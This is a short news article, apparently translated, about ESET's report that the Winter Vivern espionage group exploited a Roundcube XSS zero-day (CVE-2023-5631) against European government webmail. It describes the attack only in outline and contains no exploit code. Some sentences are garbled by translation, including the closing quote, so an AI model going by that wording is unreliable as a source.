Winter Vivern: Zero-Day XSS exploit targets Roundcube servers


ESET Research discovered a significant cybersecurity threat when the Winter Vivern Group exploited a zero-day cross-site scripting (XSS) vulnerability in the Roundcube webmail server.

The new campaign, described in an advisory published today, targeted the Roundcube webmail servers of government entities and a think tank in Europe. ESET Research quickly reported the vulnerability to the Roundcube team on October 12, and the team recognized and fixed it within a short period of time, releasing security updates on October 16.

Winter Vivern, a cyberespionage group known for targeting governments in Europe and Central Asia, has been active since at least 2020. To infiltrate its targets, the group uses a variety of methods, including malicious documents, phishing websites, and a custom PowerShell backdoor. He is believed to be linked to MustachedBouncer, a Belarus-aligned group.

Learn more about this threat: ESET unmasks cyberespionage group targeting embassies in Belarus

This isn’t the first time Winter Vivern has targeted Roundcube servers; in 2022, the group exploited CVE-2020-35730. Sednit, also known as APT28, also targets the same vulnerability.

The newly exploited XSS vulnerability, CVE-2023-5631, allows remote operation by sending a specially designed electronic message. Even fully patched Roundcube instances were vulnerable due to a server-side scripting flaw in rcube_washtml.php, which the attackers exploited.

By sending this email, attackers could inject arbitrary JavaScript code into the victim’s Roundcube session, allowing them to access and exfiltrate emails. ESET has warned that Winter Vivern’s ability to exploit a zero-day vulnerability in Roundcube represents a concerning development in the field of cyberespionage.

Winter viverna has scaled up its operations using a zero-day vulnerability in Roundcube. Previously, it used known vulnerabilities in Roundcube and Zimbra, for which proofs of concept are available online. read the review.

“Despite the low sophistication of the group’s toolset, it poses a threat to European governments due to its persistence, its very regular phishing campaigns and the fact that a significant number of applications accessible on the Internet are not regularly updated, although they are known to contain phishing attacks. vulnerabilities. »

Leave a comment